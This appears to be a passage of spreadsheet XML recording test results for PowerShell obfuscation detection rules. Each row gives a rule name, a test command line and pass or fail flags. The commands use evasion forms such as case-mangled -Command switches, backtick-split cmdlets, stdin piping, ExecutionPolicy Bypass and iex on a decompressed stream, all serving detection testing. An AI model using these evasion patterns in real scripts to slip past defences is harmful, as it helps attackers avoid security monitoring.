        <v>1</v>
      </c>
      <c r="G1823" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1823" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1823" s="43" t="n"/>
      <c r="J1823" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1823" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1824" ht="15.75" customHeight="1" s="42">
      <c r="A1824" s="43" t="n"/>
      <c r="B1824" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C1824" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D1824" s="44" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1824" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "echo Write-Host 'Bypass' | pwsh.exe -noexit -"</t>
        </is>
      </c>
      <c r="F1824" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1824" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1824" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1824" s="43" t="n"/>
      <c r="J1824" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1824" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1825" ht="15.75" customHeight="1" s="42">
      <c r="A1825" s="43" t="n"/>
      <c r="B1825" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C1825" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D1825" s="44" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1825" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "echo Write-Host 'Bypass' | pwsh.exe -noexit -"</t>
        </is>
      </c>
      <c r="F1825" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1825" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1825" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1825" s="43" t="n"/>
      <c r="J1825" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1825" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1826" ht="15.75" customHeight="1" s="42">
      <c r="A1826" s="43" t="n"/>
      <c r="B1826" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C1826" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D1826" s="44" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1826" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "echo 'Write-Host Bypass' | powershell.exe -noexit -"</t>
        </is>
      </c>
      <c r="F1826" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1826" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1826" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1826" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher (6c96fc76-0eb1-11eb-adc1-0242ac120002)</t>
        </is>
      </c>
      <c r="J1826" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1826" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1827" ht="15.75" customHeight="1" s="42">
      <c r="A1827" s="43" t="n"/>
      <c r="B1827" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C1827" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D1827" s="44" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1827" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -C "echo 'Write-Host Bypass' | powershell.exe -noexit -"</t>
        </is>
      </c>
      <c r="F1827" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1827" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1827" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1827" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher (6c96fc76-0eb1-11eb-adc1-0242ac120002)</t>
        </is>
      </c>
      <c r="J1827" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1827" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1828" ht="15.75" customHeight="1" s="42">
      <c r="A1828" s="43" t="n"/>
      <c r="B1828" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C1828" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D1828" s="44" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1828" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "echo 'Write-Host Bypass' | powershell.exe -noexit -"</t>
        </is>
      </c>
      <c r="F1828" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1828" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1828" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1828" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher (6c96fc76-0eb1-11eb-adc1-0242ac120002)</t>
        </is>
      </c>
      <c r="J1828" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1828" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1829" ht="15.75" customHeight="1" s="42">
      <c r="A1829" s="43" t="n"/>
      <c r="B1829" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C1829" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D1829" s="44" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E1829" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F1829" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1829" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1829" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1829" s="43" t="n"/>
      <c r="J1829" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1829" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1830" ht="15.75" customHeight="1" s="42">
      <c r="A1830" s="43" t="n"/>
      <c r="B1830" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C1830" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D1830" s="44" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E1830" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMaND "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F1830" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1830" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1830" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1830" s="44" t="n"/>
      <c r="J1830" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1830" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1831" ht="15.75" customHeight="1" s="42">
      <c r="A1831" s="43" t="n"/>
      <c r="B1831" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C1831" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D1831" s="44" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E1831" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommAnD "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F1831" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1831" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1831" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1831" s="44" t="n"/>
      <c r="J1831" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1831" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1832" ht="15.75" customHeight="1" s="42">
      <c r="A1832" s="43" t="n"/>
      <c r="B1832" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C1832" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D1832" s="44" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E1832" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F1832" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1832" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1832" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1832" s="43" t="n"/>
      <c r="J1832" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1832" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1833" ht="15.75" customHeight="1" s="42">
      <c r="A1833" s="43" t="n"/>
      <c r="B1833" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C1833" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D1833" s="44" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E1833" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMaNd "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F1833" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1833" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1833" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1833" s="43" t="n"/>
      <c r="J1833" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1833" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1834" ht="15.75" customHeight="1" s="42">
      <c r="A1834" s="43" t="n"/>
      <c r="B1834" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C1834" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D1834" s="44" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E1834" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmanD "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F1834" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1834" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1834" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1834" s="44" t="n"/>
      <c r="J1834" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1834" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1835" ht="15.75" customHeight="1" s="42">
      <c r="A1835" s="43" t="n"/>
      <c r="B1835" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C1835" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D1835" s="44" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E1835" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmANd "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F1835" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1835" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1835" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1835" s="43" t="n"/>
      <c r="J1835" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1835" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1836" ht="15.75" customHeight="1" s="42">
      <c r="A1836" s="43" t="n"/>
      <c r="B1836" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1836" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1836" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1836" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F1836" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1836" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1836" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1836" s="43" t="n"/>
      <c r="J1836" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1836" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1837" ht="15.75" customHeight="1" s="42">
      <c r="A1837" s="43" t="n"/>
      <c r="B1837" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1837" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1837" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1837" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAnD "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F1837" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1837" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1837" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1837" s="43" t="n"/>
      <c r="J1837" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1837" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1838" ht="15.75" customHeight="1" s="42">
      <c r="A1838" s="43" t="n"/>
      <c r="B1838" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1838" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1838" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1838" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F1838" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1838" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1838" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1838" s="43" t="n"/>
      <c r="J1838" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1838" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1839" ht="15.75" customHeight="1" s="42">
      <c r="A1839" s="43" t="n"/>
      <c r="B1839" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1839" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1839" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1839" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmAnd "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F1839" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1839" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1839" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1839" s="43" t="n"/>
      <c r="J1839" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1839" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1840" ht="15.75" customHeight="1" s="42">
      <c r="A1840" s="43" t="n"/>
      <c r="B1840" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1840" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1840" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1840" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAND "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F1840" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1840" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1840" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1840" s="43" t="n"/>
      <c r="J1840" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1840" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1841" ht="15.75" customHeight="1" s="42">
      <c r="A1841" s="43" t="n"/>
      <c r="B1841" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1841" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1841" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1841" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMAND "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F1841" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1841" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1841" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1841" s="43" t="n"/>
      <c r="J1841" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1841" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1842" ht="15.75" customHeight="1" s="42">
      <c r="A1842" s="43" t="n"/>
      <c r="B1842" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1842" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1842" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1842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842" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1842" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1842" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1842" s="44" t="n"/>
      <c r="J1842" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1842" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1843" ht="15.75" customHeight="1" s="42">
      <c r="A1843" s="43" t="n"/>
      <c r="B1843" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1843" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1843" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1843" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$stream = [System.IO.Compression.DeflateStream]::new($ms, 0); $reader = [System.IO.StreamReader]::new($stream, [System.Text.Encoding]::UTF8); iex $reader.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F1843" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1843" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1843" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1843" s="44" t="n"/>
      <c r="J1843" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1843" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1844" ht="15.75" customHeight="1" s="42">
      <c r="A1844" s="43" t="n"/>
      <c r="B1844" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1844" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1844" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1844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844" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1844" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1844" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1844" s="44" t="n"/>
      <c r="J1844" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1844" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1845" ht="15.75" customHeight="1" s="42">
      <c r="A1845" s="43" t="n"/>
      <c r="B1845" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1845" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1845" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1845" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMaNd "$stream = [System.IO.Compression.DeflateStream]::new($ms, 0); $reader = [System.IO.StreamReader]::new($stream, [System.Text.Encoding]::UTF8); iex $reader.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F1845" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1845" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1845" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1845" s="44" t="n"/>
      <c r="J1845" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1845" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1846" ht="15.75" customHeight="1" s="42">
      <c r="A1846" s="43" t="n"/>
      <c r="B1846" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C1846" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D1846" s="44" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E1846" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "set A=in^voke &amp; set B=environment &amp; echo %A% | powershell -"</t>
        </is>
      </c>
      <c r="F1846" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1846" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1846" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1846" s="44" t="n"/>
      <c r="J1846" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1846" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1847" ht="15.75" customHeight="1" s="42">
      <c r="A1847" s="43" t="n"/>
      <c r="B1847" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C1847" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D1847" s="44" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E1847" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F1847" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1847" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1847" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1847" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1847" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1847" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1848" ht="15.75" customHeight="1" s="42">
      <c r="A1848" s="43" t="n"/>
      <c r="B1848" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C1848" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D1848" s="44" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E1848" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -COmMANd "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F1848" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1848" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1848" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1848" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1848" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1848" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1849" ht="15.75" customHeight="1" s="42">
      <c r="A1849" s="43" t="n"/>
      <c r="B1849" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C1849" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D1849" s="44" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E1849" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -c "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F1849" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1849" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1849" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1849" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1849" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1849" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1850" ht="15.75" customHeight="1" s="42">
      <c r="A1850" s="43" t="n"/>
      <c r="B1850" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C1850" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D1850" s="44" t="inlineStr">
